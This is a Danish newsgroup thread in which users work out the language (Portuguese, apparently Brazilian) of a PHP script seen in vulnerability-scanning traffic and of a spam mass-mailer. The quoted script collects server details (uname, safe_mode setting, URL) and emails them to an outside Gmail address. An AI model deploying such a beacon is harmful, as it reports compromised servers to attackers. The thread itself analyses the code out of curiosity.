Hvad er det her for et sprog?
Fra : Stig Johansen

Dato : 01-04-09 15:49

Hej alle.

Ja, koden er php, men hvad er det ellers for et sprog der optræder i den her
vulnerability scanning - Portugisisk ?

<kode>
<?php
//=================================
//
// scan inb0x hotmail v3.0
//
// coded by FilhOte_Ccs and LOST
// re-c0d3d by delet
//
//
//=================================
//
ini_set("max_execution_time",-1);
set_time_limit(0);
$user = @get_current_user();
$UNAME = @php_uname();
$SafeMode = @ini_get('safe_mode');
if ($SafeMode == '') { $SafeMode = "OFF"; }
else { $SafeMode = " $SafeMode "; }
$delet=($_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']);
$dados=("<b>Produto</b> = " . $UNAME . "
<i>Seguran?a</i> = " . $SafeMode . "
http://" . $delet . "

Muito obrigado por comprar o hehe1 com: <u>delet</u>");
$email = "vulnerarios@gmail.com";
$assunto = "LINDA";
$email1 = "vulnerarios@gmail.com";
$headers = "From: <$email>\r\n";
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/html; charset=iso-8859-1\r\n";
if(mail($email1,$assunto,$dados,$headers)){
echo "Isso, ja foi!";
exit();
}
else{
echo "N?o foi.";
exit();
}
?>
</kode>

--
Med venlig hilsen/Best regards
Stig Johansen

Fra : Philip Nunnegaard

Dato : 01-04-09 17:04

Stig Johansen skrev:

> Ja, koden er php, men hvad er det ellers for et sprog der optræder i den her
> vulnerability scanning - Portugisisk ?

Portugisisk er nok et meget godt bud.
Googles oversætter giver i hvert fald et mere meningsfyldt resultat når
jeg oversætter fra portugisisk end fra spansk.

(Prøvede med "Muito obrigado por comprar o hehe1 com").
Jeg vil tro at "muito" skulle hedde "mucho" på spansk.
http://translate.google.dk/translate_t#pt|da|Muito%20obrigado%20por%20comprar%20o%20hehe1%20com

--
Philip - http://chartbase.dk

Fra : Stig Johansen

Dato : 01-04-09 18:21

Philip Nunnegaard wrote:

> Portugisisk er nok et meget godt bud.
> Googles oversætter giver i hvert fald et mere meningsfyldt resultat når
> jeg oversætter fra portugisisk end fra spansk.

Google - ja, hvorfor tænkte jeg ikke på det ?
Det er nu ret genialt det Google der - takker.

Men det må betyde, at Portugal har meldt sig på banen mht. spam.
Faldt også lige over en mass-mailer, hvor ledeteksterne:
<ledetekster>
De (Nome)/(E-Mail) :
Código HTML:
*Lembrete: texto em HTML
Coloque o email de suas vitimas abaixo:
OBS: um e-mail em cima do outro
*Separado por quebra de linha
</ledetekster>
også (næsten) giver menig ved oversættelse fra Portugisisk.

html uden php kode:
<http://w-o-p-r.dk/test/mass_mailer.html>

Stig Johansen

Fra : Bertel Lund Hansen

Dato : 01-04-09 18:27

Stig Johansen skrev:

> Men det må betyde, at Portugal har meldt sig på banen mht. spam.

Eller Brasilien? Eller en tidligere koloni? Eller en indvandrer i
Polen?

--
Bertel

Fra : Philip Nunnegaard

Dato : 01-04-09 19:05

Bertel Lund Hansen skrev:

> Eller Brasilien? Eller en tidligere koloni? Eller en indvandrer i
> Polen?

Hvis der er tale om et arnested for spam, er Brasilien eller
indvandreren i Polen nok mere realistisk.

Det giver også oversættelsen af "Coloque o email de suas vitimas
abaixo:" mening:
"Sæt ofre for deres e-mail nedenfor:"

--
Philip - http://chartbase.dk

Fra : Stig Johansen

Dato : 02-04-09 05:57

Philip Nunnegaard wrote:

> Hvis der er tale om et arnested for spam, er Brasilien eller
> indvandreren i Polen nok mere realistisk.

He - jeg afslører squ nok min uvidenhed, jeg havde godt tænkt på eks.
Brasilien, men jeg er(var) så naiv, at jeg troede de talte Spansk
derovre

..br udviser rimelig maget bot-adfærd, så det er nok derfra.

Stig Johansen

Fra : Bertel Lund Hansen

Dato : 02-04-09 10:25

Stig Johansen skrev:

> He - jeg afslører squ nok min uvidenhed, jeg havde godt tænkt på eks.
> Brasilien, men jeg er(var) så naiv, at jeg troede de talte Spansk
> derovre

De taler et sprog der er en slags portugisisk fordi landet blev
'opdaget' (læs: besat) af portugisere i koloniseringstiden.

Her er en god forklaring på engelsk om sproget:
http://en.wikipedia.org/wiki/Brazil#Language

--
Bertel

Fra : Leif Neland

Dato : 01-04-09 19:40

Stig Johansen skrev:
> Hej alle.
>
> Ja, koden er php, men hvad er det ellers for et sprog der optræder i den her
> vulnerability scanning - Portugisisk ?

http://whatlanguageisthis.com/ siger:

The language is
Mixed or Unknown